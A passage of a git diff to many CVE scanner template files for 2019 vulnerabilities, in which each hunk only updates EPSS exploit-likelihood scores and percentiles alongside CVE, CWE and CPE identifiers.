index 9b62c22086..284993967f 100644 --- a/http/cves/2019/CVE-2019-12581.yaml +++ b/http/cves/2019/CVE-2019-12581.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-12581 cwe-id: CWE-79 epss-score: 0.00642 - epss-percentile: 0.7661 + epss-percentile: 0.76878 cpe: cpe:2.3:o:zyxel:uag2100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-12583.yaml b/http/cves/2019/CVE-2019-12583.yaml index 9d7be50111..3de37cb52e 100644 --- a/http/cves/2019/CVE-2019-12583.yaml +++ b/http/cves/2019/CVE-2019-12583.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-12583 cwe-id: CWE-425 epss-score: 0.00481 - epss-percentile: 0.72824 + epss-percentile: 0.73129 cpe: cpe:2.3:o:zyxel:uag2100_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-12593.yaml b/http/cves/2019/CVE-2019-12593.yaml index 7d533a5ce3..0f5ab4d387 100644 --- a/http/cves/2019/CVE-2019-12593.yaml +++ b/http/cves/2019/CVE-2019-12593.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-12593 cwe-id: CWE-22 epss-score: 0.13201 - epss-percentile: 0.94827 + epss-percentile: 0.94911 cpe: cpe:2.3:a:icewarp:mail_server:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-12616.yaml b/http/cves/2019/CVE-2019-12616.yaml index 9496094768..830d4e0548 100644 --- a/http/cves/2019/CVE-2019-12616.yaml +++ b/http/cves/2019/CVE-2019-12616.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.5 cve-id: CVE-2019-12616 cwe-id: CWE-352 - epss-score: 0.00989 - epss-percentile: 0.81614 + epss-score: 0.00799 + epss-percentile: 0.79682 cpe: cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-12725.yaml b/http/cves/2019/CVE-2019-12725.yaml index 1062b6c543..eb00131ab8 100644 --- a/http/cves/2019/CVE-2019-12725.yaml +++ b/http/cves/2019/CVE-2019-12725.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-12725 cwe-id: CWE-78 - epss-score: 0.96479 - epss-percentile: 0.99394 + epss-score: 0.9653 + epss-percentile: 0.99453 cpe: cpe:2.3:o:zeroshell:zeroshell:3.9.0:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-12962.yaml b/http/cves/2019/CVE-2019-12962.yaml index f4770c6de9..07eb249143 100644 --- a/http/cves/2019/CVE-2019-12962.yaml +++ b/http/cves/2019/CVE-2019-12962.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-12962 cwe-id: CWE-79 epss-score: 0.20689 - epss-percentile: 0.95731 + epss-percentile: 0.95798 cpe: cpe:2.3:a:livezilla:livezilla:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-12985.yaml b/http/cves/2019/CVE-2019-12985.yaml index 2f20b07f6f..90529e8a90 100644 --- a/http/cves/2019/CVE-2019-12985.yaml +++ b/http/cves/2019/CVE-2019-12985.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-12985 cwe-id: CWE-78 epss-score: 0.97433 - epss-percentile: 0.99906 + epss-percentile: 0.9992 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-12986.yaml b/http/cves/2019/CVE-2019-12986.yaml index 595eda0c20..31d633a5a8 100644 --- a/http/cves/2019/CVE-2019-12986.yaml +++ b/http/cves/2019/CVE-2019-12986.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-12986 cwe-id: CWE-78 epss-score: 0.97433 - epss-percentile: 0.99906 + epss-percentile: 0.9992 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-12987.yaml b/http/cves/2019/CVE-2019-12987.yaml index 80ce6d9686..24f317dd69 100644 --- a/http/cves/2019/CVE-2019-12987.yaml +++ b/http/cves/2019/CVE-2019-12987.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-12987 cwe-id: CWE-78 epss-score: 0.97433 - epss-percentile: 0.99906 + epss-percentile: 0.9992 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-12988.yaml b/http/cves/2019/CVE-2019-12988.yaml index f4e5bf51d2..99c2bfb47f 100644 --- a/http/cves/2019/CVE-2019-12988.yaml +++ b/http/cves/2019/CVE-2019-12988.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-12988 cwe-id: CWE-78 epss-score: 0.97433 - epss-percentile: 0.99906 + epss-percentile: 0.9992 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-12990.yaml b/http/cves/2019/CVE-2019-12990.yaml index 3173a84b99..887ada60ba 100644 --- a/http/cves/2019/CVE-2019-12990.yaml +++ b/http/cves/2019/CVE-2019-12990.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-12990 cwe-id: CWE-22 epss-score: 0.95724 - epss-percentile: 0.99172 + epss-percentile: 0.99216 cpe: cpe:2.3:a:citrix:netscaler_sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2019/CVE-2019-13101.yaml b/http/cves/2019/CVE-2019-13101.yaml index e1320b131b..3070b3538f 100644 --- a/http/cves/2019/CVE-2019-13101.yaml +++ b/http/cves/2019/CVE-2019-13101.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-13101 cwe-id: CWE-306 epss-score: 0.03717 - epss-percentile: 0.90578 + epss-percentile: 0.90694 cpe: cpe:2.3:o:dlink:dir-600m_firmware:3.02:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-13392.yaml b/http/cves/2019/CVE-2019-13392.yaml index 6229325043..84b178a140 100644 --- a/http/cves/2019/CVE-2019-13392.yaml +++ b/http/cves/2019/CVE-2019-13392.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-13392 cwe-id: CWE-79 epss-score: 0.0014 - epss-percentile: 0.4905 + epss-percentile: 0.49416 cpe: cpe:2.3:a:mindpalette:natemail:3.0.15:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-13396.yaml b/http/cves/2019/CVE-2019-13396.yaml index b45ac3d19e..fcde93b06b 100644 --- a/http/cves/2019/CVE-2019-13396.yaml +++ b/http/cves/2019/CVE-2019-13396.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-13396 cwe-id: CWE-22 epss-score: 0.02107 - epss-percentile: 0.87729 + epss-percentile: 0.87884 cpe: cpe:2.3:a:getflightpath:flightpath:*:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-13462.yaml b/http/cves/2019/CVE-2019-13462.yaml index 89e857eafb..a1a84a2ebf 100644 --- a/http/cves/2019/CVE-2019-13462.yaml +++ b/http/cves/2019/CVE-2019-13462.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.1 cve-id: CVE-2019-13462 cwe-id: CWE-89 - epss-score: 0.41054 - epss-percentile: 0.96803 + epss-score: 0.36935 + epss-percentile: 0.96703 cpe: cpe:2.3:a:lansweeper:lansweeper:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-14205.yaml b/http/cves/2019/CVE-2019-14205.yaml index 44433a33dc..f07d4804b4 100644 --- a/http/cves/2019/CVE-2019-14205.yaml +++ b/http/cves/2019/CVE-2019-14205.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-14205 cwe-id: CWE-22 epss-score: 0.06333 - epss-percentile: 0.92717 + epss-percentile: 0.92813 cpe: cpe:2.3:a:nevma:adaptive_images:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-14223.yaml b/http/cves/2019/CVE-2019-14223.yaml index 6f471e91bd..2b04e860b9 100644 --- a/http/cves/2019/CVE-2019-14223.yaml +++ b/http/cves/2019/CVE-2019-14223.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-14223 cwe-id: CWE-601 epss-score: 0.00188 - epss-percentile: 0.55496 + epss-percentile: 0.55993 cpe: cpe:2.3:a:alfresco:alfresco:*:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-14251.yaml b/http/cves/2019/CVE-2019-14251.yaml index 84084bb455..f821727438 100644 --- a/http/cves/2019/CVE-2019-14251.yaml +++ b/http/cves/2019/CVE-2019-14251.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-14251 cwe-id: CWE-22 epss-score: 0.01349 - epss-percentile: 0.84467 + epss-percentile: 0.84618 cpe: cpe:2.3:a:temenos:t24:r15.01:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-14312.yaml b/http/cves/2019/CVE-2019-14312.yaml index 2519d4664e..92e98f1fd1 100644 --- a/http/cves/2019/CVE-2019-14312.yaml +++ b/http/cves/2019/CVE-2019-14312.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-14312 cwe-id: CWE-22 epss-score: 0.02327 - epss-percentile: 0.88328 + epss-percentile: 0.88489 cpe: cpe:2.3:a:aptana:jaxer:1.0.3.4547:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-14322.yaml b/http/cves/2019/CVE-2019-14322.yaml index a5f4d4638e..ce8c73fb1f 100644 --- a/http/cves/2019/CVE-2019-14322.yaml +++ b/http/cves/2019/CVE-2019-14322.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-14322 cwe-id: CWE-22 epss-score: 0.58463 - epss-percentile: 0.97287 + epss-percentile: 0.97343 cpe: cpe:2.3:a:palletsprojects:werkzeug:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2019/CVE-2019-14470.yaml b/http/cves/2019/CVE-2019-14470.yaml index 82a10a2b30..bd7a51aa93 100644 --- a/http/cves/2019/CVE-2019-14470.yaml +++ b/http/cves/2019/CVE-2019-14470.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-14470 cwe-id: CWE-79 - epss-score: 0.78633 - epss-percentile: 0.97832 + epss-score: 0.77164 + epss-percentile: 0.97844 cpe: cpe:2.3:a:instagram-php-api_project:instagram-php-api:-:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-14530.yaml b/http/cves/2019/CVE-2019-14530.yaml index f66e9b2ac8..afabd5dba5 100644 --- a/http/cves/2019/CVE-2019-14530.yaml +++ b/http/cves/2019/CVE-2019-14530.yaml @@ -18,8 +18,8 @@ info: cvss-score: 8.8 cve-id: CVE-2019-14530 cwe-id: CWE-22 - epss-score: 0.83277 - epss-percentile: 0.97995 + epss-score: 0.84676 + epss-percentile: 0.98117 cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-14696.yaml b/http/cves/2019/CVE-2019-14696.yaml index c39c1764c0..c3ed02e6dc 100644 --- a/http/cves/2019/CVE-2019-14696.yaml +++ b/http/cves/2019/CVE-2019-14696.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-14696 cwe-id: CWE-79 epss-score: 0.00776 - epss-percentile: 0.79096 + epss-percentile: 0.79317 cpe: cpe:2.3:a:open-school:open-school:2.3:*:*:*:community:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-14750.yaml b/http/cves/2019/CVE-2019-14750.yaml index 6c01822562..9e6881ace3 100644 --- a/http/cves/2019/CVE-2019-14750.yaml +++ b/http/cves/2019/CVE-2019-14750.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-14750 cwe-id: CWE-79 epss-score: 0.05309 - epss-percentile: 0.92085 + epss-percentile: 0.92202 cpe: cpe:2.3:a:osticket:osticket:*:*:*:*:*:*:*:* metadata: max-request: 4 diff --git a/http/cves/2019/CVE-2019-14789.yaml b/http/cves/2019/CVE-2019-14789.yaml index 7448d4f86b..dbee280373 100644 --- a/http/cves/2019/CVE-2019-14789.yaml +++ b/http/cves/2019/CVE-2019-14789.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-14789 cwe-id: CWE-79 epss-score: 0.00125 - epss-percentile: 0.46223 + epss-percentile: 0.46555 cpe: cpe:2.3:a:kunalnagar:custom_404_pro:3.2.8:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-14974.yaml b/http/cves/2019/CVE-2019-14974.yaml index d5dfdc8a1b..ac7045ed6a 100644 --- a/http/cves/2019/CVE-2019-14974.yaml +++ b/http/cves/2019/CVE-2019-14974.yaml @@ -16,7 +16,7 @@ info: cve-id: CVE-2019-14974 cwe-id: CWE-79 epss-score: 0.00217 - epss-percentile: 0.59028 + epss-percentile: 0.59426 cpe: cpe:2.3:a:sugarcrm:sugarcrm:9.0.0:*:*:*:enterprise:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-15043.yaml b/http/cves/2019/CVE-2019-15043.yaml index fcbf92d097..9d9aad7c89 100644 --- a/http/cves/2019/CVE-2019-15043.yaml +++ b/http/cves/2019/CVE-2019-15043.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-15043 cwe-id: CWE-306 - epss-score: 0.27328 - epss-percentile: 0.96168 + epss-score: 0.22002 + epss-percentile: 0.95899 cpe: cpe:2.3:a:grafana:grafana:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-15107.yaml b/http/cves/2019/CVE-2019-15107.yaml index 20e7935d3d..108b160a95 100644 --- a/http/cves/2019/CVE-2019-15107.yaml +++ b/http/cves/2019/CVE-2019-15107.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-15107 cwe-id: CWE-78 - epss-score: 0.97528 - epss-percentile: 0.99981 + epss-score: 0.97498 + epss-percentile: 0.9997 cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-15501.yaml b/http/cves/2019/CVE-2019-15501.yaml index b67b7f83e9..68d633f08e 100644 --- a/http/cves/2019/CVE-2019-15501.yaml +++ b/http/cves/2019/CVE-2019-15501.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-15501 cwe-id: CWE-79 epss-score: 0.00303 - epss-percentile: 0.65819 + epss-percentile: 0.66158 cpe: cpe:2.3:a:lsoft:listserv:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-15642.yaml b/http/cves/2019/CVE-2019-15642.yaml index 8eda25daa2..d64504993b 100644 --- a/http/cves/2019/CVE-2019-15642.yaml +++ b/http/cves/2019/CVE-2019-15642.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-15642 cwe-id: CWE-94 epss-score: 0.26994 - epss-percentile: 0.96156 + epss-percentile: 0.96214 cpe: cpe:2.3:a:webmin:webmin:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-15713.yaml b/http/cves/2019/CVE-2019-15713.yaml index ec9fca3d06..e23d1721f2 100644 --- a/http/cves/2019/CVE-2019-15713.yaml +++ b/http/cves/2019/CVE-2019-15713.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2019-15713 cwe-id: CWE-79 epss-score: 0.00101 - epss-percentile: 0.40822 + epss-percentile: 0.41124 cpe: cpe:2.3:a:my_calendar_project:my_calendar:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-15811.yaml b/http/cves/2019/CVE-2019-15811.yaml index b4f5edeb7c..6297a49730 100644 --- a/http/cves/2019/CVE-2019-15811.yaml +++ b/http/cves/2019/CVE-2019-15811.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-15811 cwe-id: CWE-79 epss-score: 0.00376 - epss-percentile: 0.6932 + epss-percentile: 0.69639 cpe: cpe:2.3:a:domainmod:domainmod:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-15858.yaml b/http/cves/2019/CVE-2019-15858.yaml index c17e9e6065..a395b8d7e3 100644 --- a/http/cves/2019/CVE-2019-15858.yaml +++ b/http/cves/2019/CVE-2019-15858.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-15858 cwe-id: CWE-306 epss-score: 0.02782 - epss-percentile: 0.8928 + epss-percentile: 0.89439 cpe: cpe:2.3:a:webcraftic:woody_ad_snippets:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-15859.yaml b/http/cves/2019/CVE-2019-15859.yaml index 67616c2383..edda31874a 100644 --- a/http/cves/2019/CVE-2019-15859.yaml +++ b/http/cves/2019/CVE-2019-15859.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-15859 cwe-id: CWE-200 epss-score: 0.12379 - epss-percentile: 0.94685 + epss-percentile: 0.94781 cpe: cpe:2.3:o:socomec:diris_a-40_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-15889.yaml b/http/cves/2019/CVE-2019-15889.yaml index ebe65a1d44..1431fe4911 100644 --- a/http/cves/2019/CVE-2019-15889.yaml +++ b/http/cves/2019/CVE-2019-15889.yaml @@ -18,8 +18,8 @@ info: cvss-score: 6.1 cve-id: CVE-2019-15889 cwe-id: CWE-79 - epss-score: 0.0427 - epss-percentile: 0.91187 + epss-score: 0.03835 + epss-percentile: 0.90839 cpe: cpe:2.3:a:wpdownloadmanager:wordpress_download_manager:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16057.yaml b/http/cves/2019/CVE-2019-16057.yaml index 9fa79509d7..56b9c862a7 100644 --- a/http/cves/2019/CVE-2019-16057.yaml +++ b/http/cves/2019/CVE-2019-16057.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-16057 cwe-id: CWE-78 - epss-score: 0.97548 - epss-percentile: 0.99991 + epss-score: 0.97554 + epss-percentile: 0.99994 cpe: cpe:2.3:o:dlink:dns-320_firmware:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-16097.yaml b/http/cves/2019/CVE-2019-16097.yaml index 1793fdda86..3a899fde85 100644 --- a/http/cves/2019/CVE-2019-16097.yaml +++ b/http/cves/2019/CVE-2019-16097.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-16097 cwe-id: CWE-862 epss-score: 0.96909 - epss-percentile: 0.99592 + epss-percentile: 0.99613 cpe: cpe:2.3:a:linuxfoundation:harbor:1.7.0:-:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16123.yaml b/http/cves/2019/CVE-2019-16123.yaml index 87c51b1c7a..83b6534172 100644 --- a/http/cves/2019/CVE-2019-16123.yaml +++ b/http/cves/2019/CVE-2019-16123.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-16123 cwe-id: CWE-22 epss-score: 0.72953 - epss-percentile: 0.97666 + epss-percentile: 0.97731 cpe: cpe:2.3:a:kartatopia:piluscart:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16278.yaml b/http/cves/2019/CVE-2019-16278.yaml index a6e6f96ae8..9fc720b38b 100644 --- a/http/cves/2019/CVE-2019-16278.yaml +++ b/http/cves/2019/CVE-2019-16278.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-16278 cwe-id: CWE-22 - epss-score: 0.97349 - epss-percentile: 0.99835 + epss-score: 0.97357 + epss-percentile: 0.99858 cpe: cpe:2.3:a:nazgul:nostromo_nhttpd:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16313.yaml b/http/cves/2019/CVE-2019-16313.yaml index 072e83a228..d3ff197150 100644 --- a/http/cves/2019/CVE-2019-16313.yaml +++ b/http/cves/2019/CVE-2019-16313.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.5 cve-id: CVE-2019-16313 cwe-id: CWE-798 - epss-score: 0.02626 - epss-percentile: 0.88983 + epss-score: 0.02184 + epss-percentile: 0.88133 cpe: cpe:2.3:o:ifw8:fr6_firmware:4.31:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16332.yaml b/http/cves/2019/CVE-2019-16332.yaml index 787c95223f..c3d90a940a 100644 --- a/http/cves/2019/CVE-2019-16332.yaml +++ b/http/cves/2019/CVE-2019-16332.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-16332 cwe-id: CWE-79 epss-score: 0.00303 - epss-percentile: 0.65787 + epss-percentile: 0.66129 cpe: cpe:2.3:a:api_bearer_auth_project:api_bearer_auth:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16525.yaml b/http/cves/2019/CVE-2019-16525.yaml index 46f76f2c51..dcd57a8e76 100644 --- a/http/cves/2019/CVE-2019-16525.yaml +++ b/http/cves/2019/CVE-2019-16525.yaml @@ -19,7 +19,7 @@ info: cve-id: CVE-2019-16525 cwe-id: CWE-79 epss-score: 0.00323 - epss-percentile: 0.66929 + epss-percentile: 0.6729 cpe: cpe:2.3:a:checklist:checklist:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-1653.yaml b/http/cves/2019/CVE-2019-1653.yaml index 47893c9fbc..087f36e686 100644 --- a/http/cves/2019/CVE-2019-1653.yaml +++ b/http/cves/2019/CVE-2019-1653.yaml @@ -19,7 +19,7 @@ info: cvss-score: 7.5 cve-id: CVE-2019-1653 cwe-id: CWE-200,CWE-284 - epss-score: 0.97578 + epss-score: 0.97575 epss-percentile: 1 cpe: cpe:2.3:o:cisco:rv320_firmware:1.4.2.15:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2019/CVE-2019-16662.yaml b/http/cves/2019/CVE-2019-16662.yaml index 9f076dfad9..f677a502dd 100644 --- a/http/cves/2019/CVE-2019-16662.yaml +++ b/http/cves/2019/CVE-2019-16662.yaml @@ -18,7 +18,7 @@ info: cvss-score: 9.8 cve-id: CVE-2019-16662 cwe-id: CWE-78 - epss-score: 0.97573 + epss-score: 0.97567 epss-percentile: 0.99999 cpe: cpe:2.3:a:rconfig:rconfig:3.9.2:*:*:*:*:*:*:* metadata: diff --git a/http/cves/2019/CVE-2019-16759.yaml b/http/cves/2019/CVE-2019-16759.yaml index 5f3451e227..a6db7dd2f5 100644 --- a/http/cves/2019/CVE-2019-16759.yaml +++ b/http/cves/2019/CVE-2019-16759.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-16759 cwe-id: CWE-94 epss-score: 0.97535 - epss-percentile: 0.99987 + epss-percentile: 0.9999 cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-16920.yaml b/http/cves/2019/CVE-2019-16920.yaml index 371fa24352..cfa1a7108b 100644 --- a/http/cves/2019/CVE-2019-16920.yaml +++ b/http/cves/2019/CVE-2019-16920.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-16920 cwe-id: CWE-78 - epss-score: 0.96275 - epss-percentile: 0.99325 + epss-score: 0.96307 + epss-percentile: 0.99368 cpe: cpe:2.3:o:dlink:dir-655_firmware:*:*:*:*:*:*:*:* metadata: max-request: 3 diff --git a/http/cves/2019/CVE-2019-16931.yaml b/http/cves/2019/CVE-2019-16931.yaml index b38290bacf..6dda63b1af 100644 --- a/http/cves/2019/CVE-2019-16931.yaml +++ b/http/cves/2019/CVE-2019-16931.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-16931 cwe-id: CWE-79 epss-score: 0.00244 - epss-percentile: 0.61655 + epss-percentile: 0.62081 cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2019/CVE-2019-16932.yaml b/http/cves/2019/CVE-2019-16932.yaml index 452579e443..28f71bfb62 100644 --- a/http/cves/2019/CVE-2019-16932.yaml +++ b/http/cves/2019/CVE-2019-16932.yaml @@ -20,7 +20,7 @@ info: cve-id: CVE-2019-16932 cwe-id: CWE-918 epss-score: 0.53434 - epss-percentile: 0.97161 + epss-percentile: 0.97211 cpe: cpe:2.3:a:themeisle:visualizer:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16996.yaml b/http/cves/2019/CVE-2019-16996.yaml index cd74bd299a..489ca65327 100644 --- a/http/cves/2019/CVE-2019-16996.yaml +++ b/http/cves/2019/CVE-2019-16996.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.2 cve-id: CVE-2019-16996 cwe-id: CWE-89 - epss-score: 0.30632 - epss-percentile: 0.96378 + epss-score: 0.27842 + epss-percentile: 0.96258 cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-16997.yaml b/http/cves/2019/CVE-2019-16997.yaml index 191bd7d6f5..90178449dd 100644 --- a/http/cves/2019/CVE-2019-16997.yaml +++ b/http/cves/2019/CVE-2019-16997.yaml @@ -15,8 +15,8 @@ info: cvss-score: 7.2 cve-id: CVE-2019-16997 cwe-id: CWE-89 - epss-score: 0.30632 - epss-percentile: 0.96378 + epss-score: 0.27842 + epss-percentile: 0.96258 cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-17270.yaml b/http/cves/2019/CVE-2019-17270.yaml index 150568170a..742d82e499 100644 --- a/http/cves/2019/CVE-2019-17270.yaml +++ b/http/cves/2019/CVE-2019-17270.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-17270 cwe-id: CWE-78 - epss-score: 0.94092 - epss-percentile: 0.98826 + epss-score: 0.93782 + epss-percentile: 0.98839 cpe: cpe:2.3:a:yachtcontrol:yachtcontrol:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-17382.yaml b/http/cves/2019/CVE-2019-17382.yaml index 67535f5850..27f0cfa7b2 100644 --- a/http/cves/2019/CVE-2019-17382.yaml +++ b/http/cves/2019/CVE-2019-17382.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.1 cve-id: CVE-2019-17382 cwe-id: CWE-639 - epss-score: 0.25064 - epss-percentile: 0.9605 + epss-score: 0.3141 + epss-percentile: 0.96452 cpe: cpe:2.3:a:zabbix:zabbix:*:*:*:*:*:*:*:* metadata: max-request: 100 diff --git a/http/cves/2019/CVE-2019-17418.yaml b/http/cves/2019/CVE-2019-17418.yaml index fc4f549c29..b4bee4f5b6 100644 --- a/http/cves/2019/CVE-2019-17418.yaml +++ b/http/cves/2019/CVE-2019-17418.yaml @@ -16,8 +16,8 @@ info: cvss-score: 7.2 cve-id: CVE-2019-17418 cwe-id: CWE-89 - epss-score: 0.43984 - epss-percentile: 0.96882 + epss-score: 0.48525 + epss-percentile: 0.97091 cpe: cpe:2.3:a:metinfo:metinfo:7.0.0:beta:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-17444.yaml b/http/cves/2019/CVE-2019-17444.yaml index 7319970a5f..f7814b4bc0 100644 --- a/http/cves/2019/CVE-2019-17444.yaml +++ b/http/cves/2019/CVE-2019-17444.yaml @@ -17,8 +17,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-17444 cwe-id: CWE-521 - epss-score: 0.07015 - epss-percentile: 0.9309 + epss-score: 0.08495 + epss-percentile: 0.93703 cpe: cpe:2.3:a:jfrog:artifactory:*:*:*:*:*:-:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-17503.yaml b/http/cves/2019/CVE-2019-17503.yaml index 6638f1f6dd..fc23b72d4b 100644 --- a/http/cves/2019/CVE-2019-17503.yaml +++ b/http/cves/2019/CVE-2019-17503.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2019-17503 cwe-id: CWE-425 epss-score: 0.00433 - epss-percentile: 0.71395 + epss-percentile: 0.717 cpe: cpe:2.3:a:kirona:dynamic_resource_scheduling:5.5.3.5:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2019/CVE-2019-17506.yaml b/http/cves/2019/CVE-2019-17506.yaml index 8a6121338d..484a951918 100644 --- a/http/cves/2019/CVE-2019-17506.yaml +++ b/http/cves/2019/CVE-2019-17506.yaml @@ -16,8 +16,8 @@ info: cvss-score: 9.8 cve-id: CVE-2019-17506 cwe-id: CWE-306 - epss-score: 0.90125 - epss-percentile: 0.98375 + epss-score: 0.91237 + epss-percentile: 0.98536 cpe: cpe:2.3:o:dlink:dir-868l_b1_firmware:2.03:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2019/CVE-2019-17538.yaml b/http/cves/2019/CVE-2019-17538.yaml index ff76f21cb2..af8d2eeab1 100644 --- a/http/cves/2019/CVE-2019-17538.yaml +++ 